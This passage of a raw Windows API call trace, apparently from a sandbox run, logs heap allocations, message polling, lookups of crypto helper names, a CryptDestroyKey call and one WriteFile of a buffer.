hHeap=0x970000) returned 1 [0267.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6798) returned 0x2f36638 [0267.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2fe98 | out: hHeap=0x970000) returned 1 [0267.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0267.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0267.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0267.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0267.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.511] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0267.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0267.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0267.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0267.511] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.512] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0267.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0267.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0267.512] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0267.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0267.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0267.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0267.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0267.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0267.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0267.513] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.513] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.513] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.513] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0267.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0267.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.513] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.514] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0267.518] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f16018*, nNumberOfBytesToWrite=0x6798, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f16018*, lpNumberOfBytesWritten=0x8cf5e4*=0x6798, lpOverlapped=0x0) returned 1 [0267.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0267.520] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0267.520] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0267.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0267.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.520] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.521] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0267.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0267.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0267.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51a48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0267.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.522] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0267.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0267.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.522] CryptDestroyKey (hKey=0xa87350) returned 1 [0267.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0267.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0267.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0267.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0267.524] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0267.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0267.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0267.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.525] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0267.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.525] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0267.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0267.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0267.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0267.525] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.525] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0267.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0267.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.525] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0267.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0267.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0267.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0267.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0267.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0267.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0267.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0267.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0267.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0267.527] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0267.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.527] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.527] RtlAllocateHeap 